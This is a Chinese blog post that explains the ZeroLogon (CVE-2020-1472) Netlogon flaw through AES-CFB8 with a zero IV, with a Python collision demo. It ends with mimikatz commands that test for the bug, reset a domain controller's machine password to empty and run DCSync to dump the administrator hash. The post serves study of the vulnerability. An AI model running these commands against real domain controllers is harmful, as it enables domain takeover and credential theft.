【内网渗透】也聊CVE-2020-1472 ZeroLogon AES-CFB8

原创 于 2025-06-27 17:12:47 发布 · 973 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ZeroLogon #CVE-2020-1472 #Netlogon #内网渗透 #域渗透 #网络安全

目录

Intro

Netlogon认证流程&缺陷

新的思考

漏洞利用

Intro

今天在复习密码学,想起来很久以前打的Zerologon是CFB8的问题,分析一下,从原理的角度聊聊

简单介绍一下这个洞吧:

CVE-2020-1472,未经身份验证的攻击者只需要能访问域控的135端口即可通过Netlogon远程协议连接域控并重置机器账户的Hash,从而导致攻击者可以利用域控的机器账户导出域内所有用户的Hash(域控的机器账户默认具有DCSync权限),进而接管整个域。

该漏洞存在的原因是Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭据的情况下通过认证。通过认证后,调用Netlogon协议中RPC函数NetrServerPasswordSet2来重置域控机器账户的Hash,从而接管全域。

Netlogon认证流程&缺陷

Netlogon服务为域内的身份验证提供一个安全通道,它被用于执行与域用户和机器身份验证相关的各种任务,最常见的是让用户使用NTLM协议登录服务器。默认情况下,Netlogon在域内所有机器后台运行(lsass.exe)

Netlogon客户端和服务端之间通过Microsoft Netlogon Remote Protocol(MS-NRPC)来进行通信。

不同于其他RPC,MS-NRPC自定义了一个认证解决方案

攻击者可控的因素有Client Challenge(在“Zerologon”中,攻击者会将client challenge设置为全0),server challenge在每一轮认证过程中都会变化,secret对应于用户密码的hash,Encrypt的过程采用的是AES-CFB8,其运算过程如下:

首先初始化一个16字节的IV,并用Session Key对其进行AES加密,得到的结果中的第一个字节与8字节的明文input(其实就是Client Challenge)的第一个字节进行异或运算,将异或结果放在IV末尾,IV整体向前移1个字节,得到新的IV。然后重复上述加密、异或、放末尾、移位步骤,直至将所有的明文input加密完毕,得到密文output,密文output与明文input长度相同

AES-CFB8安全性取决于随机选择的IV。但在Netlogon RPC中,作为ComputeNetlogonCredential检查的一部分,IV被错误的设置为0。

如果IV和Client Challenge为全0的话,那么整个AES运算过程在特定Session Key下有概率变成: 

 在认证过程中计算出的Session Key是随机的(因为Server Challenge是随机的),那么对全0的IV有1/256(就是2^8)的概率使其output的第一字节为0,IV值为0的第一字节与明文的值为0的第一字节异或也得0,放末尾、移位后IV仍不变,为全0。以此类推。

由于Netlogon协议对机器账户的认证次数没有限制,因此攻击者可以不断尝试来通过身份认证。

新的思考

其实不只是把IV置为全0,置为重复字节也一样利用

明文也不只是限于全0,只要是重复字节就行

IV的单字节只要和明文的单字节异或出和IV相同的字节就行(撞出对应的Session Key)

最终得到的密文值等于IV

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
from Crypto.Util.number import bytes_to_long


def aes_cfb8_encrypt(plaintext, key, iv=None):
    iv = b"\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34"

    cipher = AES.new(key, AES.MODE_CFB, iv=iv, segment_size=8)  # segment_size=8 for CFB8
    ciphertext = cipher.encrypt(plaintext)
    return (ciphertext)


# Example usage
if __name__ == "__main__":
    # Generate a random AES key (16 bytes for AES-128)

    # Our plaintext
    plaintext = b"\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22"

    # Encrypt
    while (True):
        key = get_random_bytes(16)

        ciphertext = aes_cfb8_encrypt(plaintext, key)

        if (ciphertext == b"\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34\x34"):
            print("success")
            break

所以要求IV值要高度随机

漏洞利用

利用Mimikatz的Zerologon模块去探测域控是否存在该漏洞

mimikatz.exe "lsadump::zerologon /target:192.168.43.100 /account:DC01$" exit

利用NetrServerPasswordSet2修改域控密码为空,这一步会把域控dc(即dc$用户)的密码置为空,因为机器用户是不可以登录系统的,但是域控的机器用户具备Dcsync特权,我们就可以滥用该特权来进行Dcsync攻击 

mimikatz.exe "lsadump::zerologon /target:192.168.43.100 /account:DC01$ /exploit" exit

Dcsync获取域管理员的Hash,这一步可以使用Mimikatz来进行Dcsync并获取域管理员帐户或 KRBTGT 帐户的哈希值即可。

mimikatz.exe "lsadump::dcsync /domain:main.test.com /dc:DC01 /user:administrator /authuser:DC01$ /authdomain:main /authpassword:"" /authntlm" exit
Z3r4y
关注
CVE-2020-1472域渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 549
模拟环境:获取了一个加入了的计算机权限,在system账号权限的情况下,将管密码置空,导出管hash,然后进行连接
内网渗透(六十四)之CVE-2020-1472 NetLogon 权限提升漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-08 1027
20208月份微软发布的安全公告中,有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 权限提升漏洞。通过该漏洞,未经身份验证的攻击者只需要能访问的135端口即可通过 NetLogon 远程协议连接并重置机器的Hash,从而导致攻击者可以利用的机器账户导出内所有用户的Hash(的机器账户默认具有DCSync权限),进而接管整个。该漏洞存在的原因是Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭据的情况下通过认证。
CVE-2020-1472 内提权复现
weixin_39811856的博客
09-22 527
1.利用流程 漏洞利用 流程如下: 1、 置空保存在AD中的密码 2、 获取用户HASH 3、通过获取到的管理员HASH得到一个SHELL 2.安装最新的impacket: https://github.com/SecureAuthCorp/impacket 注意:不要下载tags里面的,tags里面还是3月份的! 3.漏洞利用: 1)置空(置空的不是管理员账号密码) 2)使用空密码dump上的hash 如图: WIN-I0E7JQ4II7A$用户hash已被替..
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7340
0x01漏洞背景 NetLogon远程协议是一种在Windows 上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472 漏洞缓解请教! 
荒野求生的博客
11-17 523
CVE-2020-1472 漏洞缓解请教! 服务器平台 Operating Systems https://social.technet.microsoft.com/Forums/zh-CN/01102e21-b3ee-413b-8295-9a1cdd16286e/cve20201472-netlogon-293052643525552213192843127934?forum=windowsserversystemzhchs Windows Server system 问题 .
域渗透提权】CVE-2020-1472 NetLogon 权限提升漏洞
李同學的安全圈
06-23 2708
本篇文章仅用于技术研究和学习,切勿利用文中提及手段非法渗透攻击,造成任何后果与本作者无关,切记!CVE-2020-1472 NetLogon 权限提升漏洞原因是未经身份认证的攻击者可通过使用NetLogon 远程协议(MS-NRPC)连接制器来利用此漏洞。成功利用此漏洞的攻击者可获得管理员访问权限。Netlogon 是在活动目录中比较重要的一个服务,此服务在 DC 和成员服务器上运行,为身份验证提供重要服务。...
Linux如何检查脱,ZeroLogon的利用以及分析
weixin_39609650的博客
05-14 1007
作者:daiker & wfox @360Linton-Lab在今年9月份,国外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞详情,网上也随即公开了Exp。是近几年windows上比较重量级别的一个漏洞。通过该漏洞,攻击者只需能够访问的445端口,在无需任何凭据的情况下能拿到管的权限。该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在...
Python安全攻防-从入门到入狱
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
红日评估——ATT3
最新发布
2301_81177363的博客
05-25 953
具体情况:三台内网机器,一台出网机CentOS(NAT/桥接模式)配置出网。内网网段仅主机模式。反向代理一般指代理服务器,其首先代替内网的服务器接收客户端请求并从一个或多个服务器检索资源,然后将这些资源返回给客户端。在客户端看来,这些资源就好像来自代理服务器本身一样。nmap -sV -sT -p- 172.20.10.0/24 -oA scan (可以直接扫出目录)nmap -sS -sV -A -p- 192.168.252.137 (可以直接扫出目录结构)scan.nmap。
信息安全工程师第二版考试总结+笔记
热门推荐
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
ZeroLogon测试脚本 使用Impacket库测试Zerologon漏洞(CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补制器后,检测脚本将在发送2000对RPC调用后放弃,并得出结论目标不是易受攻击的对象(错误的可能性为0.04%)。 安装 需要Python 3.7或更高版本以及Pip。 安装依赖项,如下所示: pip install -r requirements.txt 请注意,只要脚本不会被以后的Impacket版本破坏,运行pip install impacket应能正常工作。 运行脚本 脚本目标可用于目标DC或备用DC。 它也可能针对只读DC工作,但是尚未经过测试。 给定一个名为IP地址为1.2.3.4名为EXAMPLE-DC的制器,请如下
NetLogon特权提升漏洞(CVE-2020-1472)复现及问题解决
Love&Share
09-17 1万+
NetLogon特权提升漏洞(CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。CVE-2020-1472是一个windows中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与间易受攻击的安全通道时,可利用此漏洞获取管访问权限。 漏洞成因 Netlogon协议身份认证采用了挑战-响应机制,其中加密算法是AES-CFB8,并且
域渗透ZeroLogon(CVE-2020-1472)
Longwaer
01-28 3202
学习了解ZeroLogon漏洞的原理及利用方式,更快的掌握渗透的技巧,从而实现技能提升。
Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证
smellycat000的专栏
09-16 1477
聚焦源代码安全,网罗国内外最新资讯!漏洞简介CVE-2020-1472是一个windows中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的...
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9515
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
CVE-2020-1472漏洞复现
blue_fantasy的博客
01-14 2475
Text. 简介 20208月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD建立安全通道时,可利用该漏洞将AD的计算机账号密码置为空,从而服务器。 原理 详细原理参看:ZeroLogon的利用以及分析 - 安全客,安全资讯平台 本文对
内网渗透:八、CVE-2020-1472 NetLogon 内提权漏洞(密码置空)
liu_jia_liang的博客
03-08 5463
简介: 20208月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD建立安全通道时,可利用该漏洞将AD的计算机账号密码置为空,从而服务器。 Netlogon远程协议是一个可用的在Windows制器上的RPC(remote pr...
服务器排查命令,mimikatz利用zerologon攻击服务器相关命令(附蓝队自查方案)...
weixin_32019361的博客
08-02 1026
0x01 前言mimikatz 20200918版本支持通过zerologon漏洞攻击服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix官方利用截图如下 mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:d...
CVE-2020-1472-ZeroLogon
01-03
### CVE-2020-1472 Zerologon 漏洞详情 CVE-2020-1472,通常被称为“Zerologon”,是一个存在于Windows Netlogon远程协议中的严重安全漏洞。此漏洞允许攻击者通过向制器发送特制请求来获得对网络的完全制权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值